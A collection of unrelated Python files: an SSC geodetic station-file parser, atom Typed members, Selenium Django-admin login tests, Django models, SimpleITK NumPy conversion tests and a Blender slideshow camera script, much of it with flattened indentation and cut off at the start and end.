if not re.match(r"DOMES\s+NB\.\s+SITE NAME\s+TECH\. ID\.\s+X/Vx\s+Y/Vy\s+Z/Vz\.?\s+Sigmas\s+SOLN\s+DATA_START\s+DATA_END\s+REF\.\s+EPOCH", line.strip()):
errmsg = '[ERROR] Failed matching (column) header line! SSC file {:}'.format(ssc_fn)
print('[ERROR] Failed to resolve line: [{:}]'.format(line.strip()))
raise RuntimeError(errmsg)
line = fin.readline()
## examples of this line:
##[ CLASS ----------------------------m/m/Y-------------------------------------] (epn class A ssc)
##[<> -----------------------m/m/Y-------------------------] (epnd ssc)
assert(re.match(r"\s*[A-Z<>]*\s*-*m/m/Y-*", line.strip()))
line = fin.readline()
assert(line.strip().startswith('----------------------'))
## done with header, parse data
line = fin.readline()
while line:
domes, site_name, tech, id, x, y, z, sx, sy, sz, soln, data_start, data_end, ref_epoch = line.split()
x, y, z, sx, sy, sz = [float(n) for n in [x, y, z, sx, sy, sz]]
data_start, data_end, ref_epoch = [parse_ssc_date(d) for d in [data_start, data_end, ref_epoch]]
if data_end == datetime.datetime.min: data_end = datetime.datetime.max
line = fin.readline()
domes2, vx, vy, vz, svx, svy, svz = line.split()
assert(domes2 == domes)
vx, vy, vz, svx, svy, svz = [float(n) for n in [vx, vy, vz, svx, svy, svz]]
            # parenthesized for clarity (and to avoid comparing a None dt): a listed
            # site is always kept; with an empty station_list, keep any site whose
            # data starts on or before dt
            if site_name.lower() in [s.lower() for s in station_list] or (station_list == [] and (dt is None or dt >= data_start)):
                ssc_records.append(SscSite(domes=domes, site_name=site_name, id=id, soln=soln, data_start=data_start, data_stop=data_end, ref_epoch=ref_epoch, x=x, y=y, z=z, sx=sx, sy=sy, sz=sz, vx=vx, vy=vy, vz=vz))
line = fin.readline()
return ssc_records if dt is None else unique_records(ssc_records, dt)
def ssc2crd(station_list, dt, *ssc_fn, **kwargs):
sta_list = station_list
sscsite_list = []
for ssc in ssc_fn:
# print('>> parsing ssc file {:}'.format(ssc))
records = parse_ssc(ssc, sta_list, dt)
for sta in records:
index = [s.lower() for s in sta_list].index(sta.site_name.lower())
if index >= 0:
sta_list[index] = 'xxxx'
sscsite_list += records
    header = kwargs['header'] if 'header' in kwargs else 'Coordinate Extrapolation from pybern'
    datum = kwargs['datum'] if 'datum' in kwargs else 'IGS_14'
    flag = kwargs['flag'] if 'flag' in kwargs else 'APR'
    # assumption: the output filename comes from kwargs; the original code
    # referenced an undefined name `bcrd_out`
    bcrd_out = kwargs['bcrd_out'] if 'bcrd_out' in kwargs else 'pybern.CRD'
    with open(bcrd_out, 'w') as bout:
        print("{:}".format(header), file=bout)
        print("--------------------------------------------------------------------------------", file=bout)
        # the epoch placeholder was missing, so dt was silently ignored
        print("LOCAL GEODETIC DATUM: {:} EPOCH: {:}".format(datum, dt.strftime("%Y-%m-%d %H:%M:%S")), file=bout)
        print("", file=bout)
        print("NUM STATION NAME X (M) Y (M) Z (M) FLAG", file=bout)
        print("", file=bout)
        for record in sscsite_list:
            x, y, z = record.extrapolate(dt)
            # write to the output file (not stdout) and include the FLAG column
            # declared in the header (assumption: the original left `flag` unused)
            print('{:} {:} {:+15.3f} {:+15.3f} {:+15.3f} {:}'.format(record.id, record.domes, x, y, z, flag), file=bout)
| nilq/baby-python | python |
#------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from .catom import Member, DefaultValue, Validate
class Typed(Member):
""" A value which allows objects of a given type or types.
Values will be tested using the `PyObject_TypeCheck` C API call.
This call is equivalent to `type(obj) in cls.mro()`. It is less
flexible but faster than Instance. Use Instance when allowing
heterogenous values and Typed when the value type is explicit.
The value of a Typed may be set to None
"""
__slots__ = ()
def __init__(self, kind, args=None, kwargs=None, factory=None):
""" Initialize an Typed.
Parameters
----------
kind : type
The allowed type for the value.
args : tuple, optional
If 'factory' is None, then 'kind' is a callable type and
these arguments will be passed to the constructor to create
the default value.
kwargs : dict, optional
If 'factory' is None, then 'kind' is a callable type and
these keywords will be passed to the constructor to create
the default value.
factory : callable, optional
An optional factory to use for creating the default value.
If this is not provided and 'args' and 'kwargs' is None,
then the default value will be None.
"""
if factory is not None:
self.set_default_value_mode(DefaultValue.CallObject, factory)
elif args is not None or kwargs is not None:
args = args or ()
kwargs = kwargs or {}
factory = lambda: kind(*args, **kwargs)
self.set_default_value_mode(DefaultValue.CallObject, factory)
self.set_validate_mode(Validate.Typed, kind)
class ForwardTyped(Typed):
""" A Typed which delays resolving the type definition.
The first time the value is accessed or modified, the type will
be resolved and the forward typed will behave identically to a
normal typed.
"""
__slots__ = ('resolve', 'args', 'kwargs')
def __init__(self, resolve, args=None, kwargs=None, factory=None):
""" Initialize a ForwardTyped.
resolve : callable
A callable which takes no arguments and returns the type to
use for validating the values.
args : tuple, optional
If 'factory' is None, then 'resolve' will return a callable
type and these arguments will be passed to the constructor
to create the default value.
kwargs : dict, optional
If 'factory' is None, then 'resolve' will return a callable
type and these keywords will be passed to the constructor to
create the default value.
factory : callable, optional
An optional factory to use for creating the default value.
If this is not provided and 'args' and 'kwargs' is None,
then the default value will be None.
"""
self.resolve = resolve
self.args = args
self.kwargs = kwargs
if factory is not None:
self.set_default_value_mode(DefaultValue.CallObject, factory)
elif args is not None or kwargs is not None:
mode = DefaultValue.MemberMethod_Object
self.set_default_value_mode(mode, "default")
self.set_validate_mode(Validate.MemberMethod_ObjectOldNew, "validate")
def default(self, owner):
""" Called to retrieve the default value.
This is called the first time the default value is retrieved
for the member. It resolves the type and updates the internal
default handler to behave like a normal Typed member.
"""
kind = self.resolve()
args = self.args or ()
kwargs = self.kwargs or {}
factory = lambda: kind(*args, **kwargs)
self.set_default_value_mode(DefaultValue.CallObject, factory)
return kind(*args, **kwargs)
def validate(self, owner, old, new):
""" Called to validate the value.
This is called the first time a value is validated for the
member. It resolves the type and updates the internal validate
handler to behave like a normal Typed member.
"""
kind = self.resolve()
self.set_validate_mode(Validate.Typed, kind)
return self.do_validate(owner, old, new)
def clone(self):
""" Create a clone of the ForwardTyped instance.
"""
clone = super(ForwardTyped, self).clone()
clone.resolve = self.resolve
clone.args = self.args
clone.kwargs = self.kwargs
return clone
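# Hedged usage sketch (illustration only). This module uses relative imports,
# so the snippet belongs in user code and assumes the `atom` package is
# installed; the class and member names are made up:
#
#     from atom.api import Atom, Typed, ForwardTyped
#
#     class Config(Atom):
#         # default built lazily from args: dict({'log_level': 'INFO'})
#         options = Typed(dict, args=({'log_level': 'INFO'},))
#         # type resolved on first access, handy for circular references
#         parent = ForwardTyped(lambda: Config)
#
#     c = Config()
#     assert c.options == {'log_level': 'INFO'}
#     c.parent = Config()  # validated against the resolved type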
| nilq/baby-python | python |
import unittest
from selenium import webdriver
class AdminLoginPageTest(unittest.TestCase):
def setUp(self):
self.admin_username = self.admin_password = 'admin'
self.site_title = 'Global Trade Motors'
self.browser = webdriver.Firefox()
self.browser.get("http://localhost:8000/admin")
def tearDown(self):
self.browser.quit()
def test_site_title(self):
self.assertIn(
self.site_title,
self.browser.title
)
def test_site_header_name(self):
header = self.browser.find_element_by_tag_name('h1')
        self.assertEqual(
self.site_title,
header.text
)
class AdminHomePageTest(unittest.TestCase):
def setUp(self):
self.site_title = 'Global Trade Motors'
self.admin_username = self.admin_password = 'admin'
self.browser = webdriver.Firefox()
self.browser.get("http://localhost:8000/admin")
self.login()
def tearDown(self):
self.browser.quit()
def login(self):
self.browser.find_element_by_id(
'id_username').send_keys(self.admin_username)
password = self.browser.find_element_by_id(
'id_password')
password.send_keys(self.admin_password)
password.send_keys('\n')
def test_site_branding_header(self):
site_name = self.browser.find_element_by_id('site-name')
        self.assertEqual(
self.site_title,
site_name.text
)
if __name__ == '__main__':
unittest.main()
| nilq/baby-python | python |
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Product(models.Model):
productname=models.CharField(max_length= 255)
productdescription=models.TextField(null=True, blank=True)
productusage=models.TextField(null=True, blank=True)
productquantity=models.IntegerField()
user=models.ForeignKey(User, on_delete = models.DO_NOTHING)
productcost=models.IntegerField()
def __str__(self):
return self.productname
class Meta:
db_table = 'Product'
class Monk(models.Model):
monkname=models.CharField(max_length= 255)
monkage=models.IntegerField()
user=models.ManyToManyField(User)
def __str__(self):
return self.monkname
class Meta:
db_table = 'Monk'
class Member(models.Model):
    membername = models.CharField(max_length=255)
    memberage = models.IntegerField()
    user = models.ManyToManyField(User)
    memberaddress = models.CharField(max_length=255)
    membercity = models.CharField(max_length=50)
    memberstate = models.CharField(max_length=2)
    # CharField rather than IntegerField: IntegerField does not accept
    # max_length, and zip codes/phone numbers can have leading zeros
    memberzip = models.CharField(max_length=5)
    memberphone = models.CharField(max_length=11)
    def __str__(self):
        return self.membername
    class Meta:
        db_table = 'Member'
| nilq/baby-python | python |
#==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================
from __future__ import print_function
import sys
import unittest
import datetime as dt
import timeit
import SimpleITK as sitk
import numpy as np
sizeX = 4
sizeY = 5
sizeZ = 3
newSimpleITKPixelValueInt32 = -3000
newNumPyElementValueInt32 = 200
class TestNumpySimpleITKMemoryviewInterface(unittest.TestCase):
""" This tests numpy array <-> SimpleITK Image conversion. """
def setUp(self):
pass
def _helper_check_sitk_to_numpy_type(self, sitkType, numpyType):
if sitkType == sitk.sitkUnknown:
return
image = sitk.Image((9, 10), sitkType, 1)
a = sitk.GetArrayViewFromImage(image)
self.assertEqual(numpyType, a.dtype)
self.assertEqual((10, 9), a.shape)
def test_type_to_numpy(self):
"try all sitk pixel types to convert to NumPy array view"
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt8, np.uint8)
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt16, np.uint16)
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt32, np.uint32)
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt64, np.uint64)
self._helper_check_sitk_to_numpy_type(sitk.sitkInt8, np.int8)
self._helper_check_sitk_to_numpy_type(sitk.sitkInt16, np.int16)
self._helper_check_sitk_to_numpy_type(sitk.sitkInt32, np.int32)
self._helper_check_sitk_to_numpy_type(sitk.sitkInt64, np.int64)
self._helper_check_sitk_to_numpy_type(sitk.sitkFloat32, np.float32)
self._helper_check_sitk_to_numpy_type(sitk.sitkFloat64, np.float64)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt8, np.uint8)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt8, np.int8)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt16, np.uint16)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt16, np.int16)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt32, np.uint32)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt32, np.int32)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt64, np.uint64)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt64, np.int64)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorFloat32, np.float32)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorFloat64, np.float64)
def test_to_numpy_and_back(self):
"""Test converting an image to NumPy array view and back"""
img = sitk.GaussianSource( sitk.sitkFloat32, [100,100], sigma=[10]*3, mean=[50,50] )
h = sitk.Hash( img )
img2 = sitk.GetImageFromArray( sitk.GetArrayViewFromImage(img))
self.assertEqual( h, sitk.Hash( img2 ))
def test_vector_image_to_numpy(self):
"""Test converting back and forth between NumPy array view and SimpleITK
images where the SimpleITK image has multiple components and
stored as a VectorImage."""
# Check 2D
img = sitk.PhysicalPointSource(sitk.sitkVectorFloat32, [3,4])
h = sitk.Hash( img )
nda = sitk.GetArrayViewFromImage(img)
self.assertEqual(nda.shape, (4,3,2))
self.assertEqual(nda[0,0].tolist(), [0,0])
self.assertEqual(nda[2,1].tolist(), [1,2])
self.assertEqual(nda[0,:,0].tolist(), [0,1,2])
img2 = sitk.GetImageFromArray(nda, isVector=True)
self.assertEqual(h, sitk.Hash(img2))
# check 3D
img = sitk.PhysicalPointSource(sitk.sitkVectorFloat32, [3,4,5])
h = sitk.Hash(img)
nda = sitk.GetArrayViewFromImage(img)
self.assertEqual(nda.shape, (5,4,3,3))
self.assertEqual(nda[0,0,0].tolist(), [0,0,0])
self.assertEqual(nda[0,0,:,0].tolist(), [0,1,2])
self.assertEqual(nda[0,:,1,1].tolist(), [0,1,2,3])
img2 = sitk.GetImageFromArray(nda)
self.assertEqual(img2.GetSize(), img.GetSize())
self.assertEqual(img2.GetNumberOfComponentsPerPixel(), img.GetNumberOfComponentsPerPixel())
self.assertEqual(h, sitk.Hash(img2))
def test_arrayview_writable(self):
"""Test correct behavior of writablity to the returned array view."""
img = sitk.Image((9, 10), sitk.sitkFloat32, 1)
a = sitk.GetArrayViewFromImage(img)
with self.assertRaises(ValueError):
a.fill(0)
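    # A companion sketch (not part of the original suite): unlike the read-only
    # view above, GetArrayFromImage returns a writable copy that round-trips
    # through GetImageFromArray.
    def test_array_copy_writable(self):
        """The copying conversion must yield a writable array."""
        img = sitk.Image((9, 10), sitk.sitkFloat32, 1)
        a = sitk.GetArrayFromImage(img)
        a.fill(7)  # succeeds: the copy owns its memory
        img2 = sitk.GetImageFromArray(a)
        self.assertEqual(img.GetSize(), img2.GetSize())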
def test_processing_time(self):
"""Check the processing time the conversions from SimpleITK Image
to numpy array (GetArrayViewFromImage) and
numpy memoryview (GetArrayViewFromImage)."""
# Performance test for SimpleITK Image -> NumPy array
img = sitk.GaussianSource(sitk.sitkFloat32, [3000,3000], sigma=[10]*3, mean=[50,50])
print("\nGet NumPy array from 3000x3000 SimpleITK Image")
nparray_time_elapsed = min(timeit.repeat(lambda: sitk.GetArrayFromImage(img), repeat=5, number=1))
print ("Processing time of GetArrayFromImage (Copy operation) :: {0} (us)".format(nparray_time_elapsed*1e6))
npview_time_elapsed = min(timeit.repeat(lambda: sitk.GetArrayViewFromImage(img), repeat=5, number=1))
print ("Processing time of GetArrayViewFromImage (Array view) :: {0} (us)".format(npview_time_elapsed*1e6))
self.assertTrue( nparray_time_elapsed > npview_time_elapsed)
        # Performance test for NumPy array -> SimpleITK Image
        big_nparray = np.zeros((3000,3000), dtype=np.int64)
        print("\nGet SimpleITK Image from 3000x3000 NumPy array")
        image_from_nparray_elapsed = min(timeit.repeat(lambda: sitk.GetImageFromArray(big_nparray), repeat=5, number=1))
        print ("Processing time of GetImageFromArray (Copy operation) :: {0} (us)".format(image_from_nparray_elapsed*1e6))
if __name__ == '__main__':
unittest.main()
| nilq/baby-python | python |
#!/usr/bin/env python2.7
#coding:utf-8
#import bpy
import os
import math
import random
from PIL import Image
import time
import codecs
import hjson
from bslideshow.slideshow import Slideshow
from bslideshow.tools import BlenderTools
ADJUST_Y = -0.1
class Director(BlenderTools):
def __init__ (self):
self.slideshow = None
self.frame = 0.0
self.sortPhotos = False
BlenderTools.__init__(self)
def buildSlideshow (self, i, folderImages):
#folderImages = "/media/jmramoss/ALMACEN/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2"
slideshow = Slideshow('background' + str(i))
#slideshow.selectPhotos("/media/jmramoss/ALMACEN/slideshow/grid_frames/")
slideshow.selectPhotos(folderImages)
print("PRE")
print(slideshow.photos)
        if i == 0 and self.sortPhotos:
#sorted(slideshow.photos, key=path)
slideshow.photos.sort(key=lambda x: x.path)
print("POST")
print(slideshow.photos)
#quit()
        if i != 0 or not self.sortPhotos:
slideshow.shufflePhotos()
slideshow.draw()
#slideshow.alignColumn(separator=0.05)
slideshow.alignGrid(separator=0.2)
slideshow.shuffleTranslate(maxX = 0.05, maxY = 0.05)
slideshow.shuffleRotateZ()
return slideshow
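    # A minimal usage sketch (assumption: run inside Blender with the bslideshow
    # package importable; doAnimSlideshow below is the usual entry point):
    #
    #     director = Director()
    #     director.doAnimSlideshow('/path/to/photo/folder')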
def buildScene (self, folderImages):
import bpy
cam = bpy.data.objects['Camera']
print(str(type(cam)))
from pprint import pprint
pprint(cam)
print(str(cam.items()))
cam.data.clip_start = 0.001
#for i in range(1, 10):
# add_image("/media/jmramoss/ALMACEN/slideshow/ramsau-3564068_960_720.jpg", i)
slideshow = self.buildSlideshow(0, folderImages)
slideshow.parentObj.location[0] += 0.0
slideshow.parentObj.location[1] += 0.0
slideshow.parentObj.location[2] += 0.0
self.slideshow = slideshow
posZ = -0.5
        separator = 1.2  # spacing between neighbouring background grids
incZ = -1.1 * 5
        for i in range(0, 0):  # disabled: raise the upper bound to draw extra background grids
randomX = 0
randomY = 0
if False:
slideshow = self.buildSlideshow(1, folderImages)
slideshow.parentObj.location[0] += (random.uniform(-0.3, 0.3) * 1)
slideshow.parentObj.location[1] += (random.uniform(-0.3, 0.3) * 1)
slideshow.parentObj.location[2] += (2.0 * posZ) + incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(2, folderImages)
slideshow.parentObj.location[0] += -self.slideshow.getDimensions()[0] - separator + randomX
slideshow.parentObj.location[1] += 0 + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(3, folderImages)
slideshow.parentObj.location[0] += self.slideshow.getDimensions()[0] + separator + randomX
slideshow.parentObj.location[1] += 0 + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(4, folderImages)
slideshow.parentObj.location[0] += 0 + randomX
slideshow.parentObj.location[1] += self.slideshow.getDimensions()[1] + separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(5, folderImages)
slideshow.parentObj.location[0] += 0 + randomX
slideshow.parentObj.location[1] += -self.slideshow.getDimensions()[1] - separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(6, folderImages)
slideshow.parentObj.location[0] += -self.slideshow.getDimensions()[0] - separator + randomX
slideshow.parentObj.location[1] += -self.slideshow.getDimensions()[1] - separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(7, folderImages)
slideshow.parentObj.location[0] += self.slideshow.getDimensions()[0] + separator + randomX
slideshow.parentObj.location[1] += self.slideshow.getDimensions()[1] + separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(8, folderImages)
slideshow.parentObj.location[0] += -self.slideshow.getDimensions()[0] - separator + randomX
slideshow.parentObj.location[1] += self.slideshow.getDimensions()[1] + separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(9, folderImages)
slideshow.parentObj.location[0] += self.slideshow.getDimensions()[0] + separator + randomX
slideshow.parentObj.location[1] += -self.slideshow.getDimensions()[1] - separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
'''
for i in range(2):
slideshow = Slideshow('background' + str(i))
#slideshow.selectPhotos("/media/jmramoss/ALMACEN/slideshow/grid_frames/")
slideshow.selectPhotos("/media/jmramoss/ALMACEN/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2")
slideshow.shufflePhotos()
slideshow.draw()
#slideshow.alignColumn()
slideshow.alignGrid()
slideshow.shuffleTranslate()
slideshow.shuffleRotateZ()
slideshow.parentObj.location[0] += (random.uniform(-0.3, 0.3) * i)
slideshow.parentObj.location[1] += (random.uniform(-0.3, 0.3) * i)
slideshow.parentObj.location[2] += (-0.1 * i)
if i == 0:
self.slideshow = slideshow
'''
'''
#obj_camera = bpy.context.scene.camera
# Set camera translation
#scene.camera.location.x = 0.0
#scene.camera.location.y = 0.0
#scene.camera.location.z = 80.0
#fov = 50.0
#pi = 3.14159265
# Set camera fov in degrees
#scene.camera.data.angle = fov*(pi/180.0)
'''
def camLookAt (self):
import bpy
        if len(bpy.data.cameras) == 1:
            obj = bpy.data.objects['Camera'] # bpy.types.Camera
            obj.location.x = 10.0
            obj.location.y = -5.0
            obj.location.z = 5.0
'''
# Set camera rotation in euler angles
#rx = 0.0
#ry = 0.0
#rz = 0.0
#scene.camera.rotation_mode = 'XYZ'
#scene.camera.rotation_euler[0] = rx*(pi/180.0)
#scene.camera.rotation_euler[1] = ry*(pi/180.0)
#scene.camera.rotation_euler[2] = rz*(pi/180.0)
'''
def camRotate (self, rx, ry, rz):
import bpy
        if len(bpy.data.cameras) == 1:
            obj = bpy.data.objects['Camera'] # bpy.types.Camera
            obj.rotation_mode = 'XYZ'
            obj.rotation_euler[0] = rx*(math.pi/180.0)
            obj.rotation_euler[1] = ry*(math.pi/180.0)
            obj.rotation_euler[2] = rz*(math.pi/180.0)
    def showPicture (self, picName):
        """Place the camera directly above the named photo, facing it."""
        import bpy
pic = bpy.data.objects[picName]
obj = bpy.data.objects['Camera'] # bpy.types.Camera
obj.rotation_mode = 'XYZ'
obj.location.x = pic.location.x
obj.location.y = pic.location.y
obj.location.z = pic.location.z + 4.0
rx = 0
ry = 0
rz = 0
obj.rotation_euler[0] = rx*(math.pi/180.0)
obj.rotation_euler[1] = ry*(math.pi/180.0)
obj.rotation_euler[2] = rz*(math.pi/180.0)
''' Animation
#if(len(bpy.data.cameras) == 1):
# obj = bpy.data.objects['Camera'] # bpy.types.Camera
# obj.location.x = 0.0
# obj.location.y = -10.0
# obj.location.z = 10.0
# obj.keyframe_insert(data_path="location", frame=10.0)
# obj.location.x = 10.0
# obj.location.y = 0.0
# obj.location.z = 5.0
# obj.keyframe_insert(data_path="location", frame=20.0)
'''
def showSlideshow2 (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
for i in range(numPhotos):
idx = i + 1
picName = 'pic' + str(idx)
self.showPicture(picName)
frame = i * incFrames
cam = bpy.data.objects['Camera'] # bpy.types.Camera
if i == 0:
cam.keyframe_insert(data_path="location", frame=frame+(2*24))
else:
cam.keyframe_insert(data_path="location", frame=frame-(2*24))
cam.keyframe_insert(data_path="location", frame=frame)
def showSlideshow3 (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
for i in range(numPhotos):
idx = i + 1
picName = 'pic' + str(idx)
self.showPicture(picName)
frame = i * incFrames
incZ = random.uniform(-3.0, 3.0)
cam.location.z = startCamLocationZ + incZ
rx = 3.0 if i % 2 == 0 else 0.0
ry = 0.0 if i % 2 == 0 else 6.0
rz = 0.0 if i % 2 == 0 else 15.0
            cam.rotation_euler[0] = rx*(math.pi/180.0)
cam.rotation_euler[1] = ry*(math.pi/180.0)
cam.rotation_euler[2] = rz*(math.pi/180.0)
if i == 0:
cam.keyframe_insert(data_path="location", frame=frame+(2*24))
cam.keyframe_insert(data_path="rotation_euler", frame=frame+(2*24))
else:
cam.keyframe_insert(data_path="location", frame=frame-(2*24))
cam.keyframe_insert(data_path="rotation_euler", frame=frame-(2*24))
cam.keyframe_insert(data_path="location", frame=frame)
cam.keyframe_insert(data_path="rotation_euler", frame=frame)
    def showSlideshowDuration (self, duration=120):
        """Dolly the camera down onto a random photo over `duration` frames."""
        import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
idx = random.randint(1, numPhotos)
picName = 'pic' + str(idx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
cam.location.z -= random.uniform(1.0, 2.5)
cam.rotation_euler[0] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration + 12.0
def showSlideshow (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
idx = random.randint(1, numPhotos)
picName = 'pic' + str(idx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
cam.location.z -= random.uniform(1.0, 2.5)
cam.rotation_euler[0] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
def showRowColumnDuration (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
pic = bpy.data.objects[picName]
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration + 12.0
    def showAllPhotos (self, duration=120, zoom=True, onlyEnd=False):
        """Frame the whole grid, zooming in (or out when zoom is False)."""
        import bpy
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
if zoom:
